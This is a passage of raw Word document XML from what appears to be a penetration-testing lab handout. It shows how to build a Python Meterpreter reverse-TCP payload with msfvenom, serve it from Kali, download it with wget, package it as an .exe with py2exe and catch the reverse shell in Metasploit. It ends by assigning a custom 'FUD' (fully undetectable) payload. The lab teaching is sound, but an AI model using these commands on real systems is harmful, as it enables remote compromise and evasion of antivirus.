          <w:szCs w:val="21"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5676900" cy="3657600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300" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center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After installing the required files we will jump to kali to create the payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000044">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gfkb0harkddp" w:id="10"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create the payload on kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="160" w:before="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="393939"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_4zer1p37wcsi" w:id="11"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="393939"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4838700" cy="220027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>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Check your ip with the command “ip a” or “ifconfig” for the upcoming command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keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="160" w:before="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="393939"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3730iwr52wyz" w:id="12"/>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="393939"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5731200" cy="279400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>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the command</w:t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>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“sudo msfvenom -p python/meterpreter/reverse_tcp LHOST=10.0.0.58 LPORT=443 -f raw -o /var/www/html/mrtp.py”</w:t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>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">on ”LHOST” input your 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8128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>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Payload created called mrtp.py and stored on /var/www/html </w:t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71700" cy="46672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>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use the command</w:t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>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“service apache2 start”</w:t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>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to start the html server</w:t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054100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2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rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">use the command </w:t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>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">service apache2 status </w:t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>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to check if the server is running</w:t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>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now jump back to the metasploitable machine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fiowra4wdgwp" w:id="13"/>
      <w:bookmarkEnd w:id="13"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download the payload to metasploitable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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48225" cy="790575"/>
            <wp:effectExtent b="0" l="0" r="0" t="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/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">On powershell command line type the command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000073">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“wget 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http://10.0.0.58</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -O mrtp.py”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000074">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To download our </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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95888" cy="3340213"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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3340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3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_a40jcun13b6m" w:id="14"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Transform the payload into an .exe file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/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we need to create a setup file first before creating the .exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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62150" cy="47625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/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open Python IDE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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10225" cy="1781175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/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">It will look like this</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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67375" cy="2714625"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3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/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click “File” and “New File”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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29275" cy="2047875"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"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/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">insert the code provided below</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008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05.1023622047246"/>
        <w:gridCol w:w="7220.409448818898"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="1805.1023622047246"/>
            <w:gridCol w:w="7220.409448818898"/>
          </w:tblGrid>
        </w:tblGridChange>
      </w:tblGrid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60.0" w:type="dxa"/>
              <w:left w:w="160.0" w:type="dxa"/>
              <w:bottom w:w="2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line="400" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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line="335.99999999999994" w:lineRule="auto"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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160.0" w:type="dxa"/>
              <w:bottom w:w="2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line="400" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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160.0" w:type="dxa"/>
              <w:bottom w:w="2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line="400" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="d73a49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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"># -*- coding: UTF-8 -*-</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008E">
            <w:pPr>
              <w:spacing w:line="400" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="d73a49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18"/>
                <w:szCs w:val="18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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> distutils.core </w:t>
            </w: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18"/>
                <w:szCs w:val="18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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> setup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spacing w:line="400" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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73a49"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> py2exe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160.0" w:type="dxa"/>
              <w:bottom w:w="2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line="400" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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160.0" w:type="dxa"/>
              <w:bottom w:w="2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line="400" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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f42c1"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">setup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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">(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160.0" w:type="dxa"/>
              <w:bottom w:w="2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line="400" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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160.0" w:type="dxa"/>
              <w:bottom w:w="2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line="400" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">name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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> ‘</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="e36209"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Meter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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">’,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160.0" w:type="dxa"/>
              <w:bottom w:w="2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line="400" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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160.0" w:type="dxa"/>
              <w:bottom w:w="2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line="400" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">description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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> ‘</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="e36209"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">Python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18"/>
                <w:szCs w:val="18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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">based </w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="e36209"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">’,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160.0" w:type="dxa"/>
              <w:bottom w:w="2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line="400" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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160.0" w:type="dxa"/>
              <w:bottom w:w="2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line="400" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">version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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> ‘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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">1.0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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">’,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160.0" w:type="dxa"/>
              <w:bottom w:w="2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line="400" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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160.0" w:type="dxa"/>
              <w:bottom w:w="2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line="400" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">console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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">[‘mrtp.py’],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160.0" w:type="dxa"/>
              <w:bottom w:w="2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line="400" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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160.0" w:type="dxa"/>
              <w:bottom w:w="2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line="400" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">options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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve"> {‘py2exe’: {‘bundle_files’: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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">,’packages’:’ctypes’,’includes’: ‘base64,sys,socket,struct,time,code,platform,getpass,shutil’,}},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160.0" w:type="dxa"/>
              <w:bottom w:w="2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line="400" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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160.0" w:type="dxa"/>
              <w:bottom w:w="2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line="400" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">zipfile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5cc5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">None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18"/>
                <w:szCs w:val="18"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">,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160.0" w:type="dxa"/>
              <w:bottom w:w="2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line="400" w:lineRule="auto"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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160.0" w:type="dxa"/>
              <w:bottom w:w="2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line="400" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New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18"/>
                <w:szCs w:val="18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0A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90775" cy="2505075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/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Save it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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34000" cy="3933825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/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Give it the name setup.py</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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41300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">make sure that setup.py and mrtp.py are on the same folder</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AD">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now on powershell run this command to turn the payload into an exe</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000AE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“python.exe ./setup.py py2exe”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The output will look like this when the command is done running</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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14950" cy="3238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center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">After it is done we need to test if it is working</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B5">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">run the exe with the command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">“./dist/mrtp.exe”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B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center"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and jump back to kali</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000B9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_nq48z6gn2rtb" w:id="15"/>
      <w:bookmarkEnd w:id="15"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure metasploit on kali to receive a reverse shell when the payload is executed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581150" cy="342900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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72025" cy="55626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57675" cy="561975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81650" cy="466725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57625" cy="285750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33750" cy="342900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52850" cy="485775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0033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905000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52775" cy="581025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2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4224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889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05100" cy="390525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2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="160" w:before="0" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="393939"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_da639bmcjd0c" w:id="16"/>
      <w:bookmarkEnd w:id="1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2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:after="160" w:before="0" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="393939"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_fw06bf9hqw" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="393939"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Part 3: Custom FUD Payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DB">
      <w:pPr>
        <w:spacing w:after="300" w:line="264" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:color w:val="2b2b2b"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now that you’ve tested the process, create your own customized FUD meterpreter payload! Document and submit how you accomplished this.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC">
      <w:pPr>
        <w:spacing w:after="160" w:line="264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160" w:line="264" w:lineRule="auto"/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5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b2b2b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9.png"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image19.png"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image40.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image42.png"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image28.png"/><Relationship Id="rId45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48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15.png"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image31.png"/><Relationship Id="rId49" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image37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2.png"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image30.png"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image32.png"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.png"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://10.0.0.58" TargetMode="External"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image46.png"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image44.png"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image47.png"/><Relationship Id="rId36" 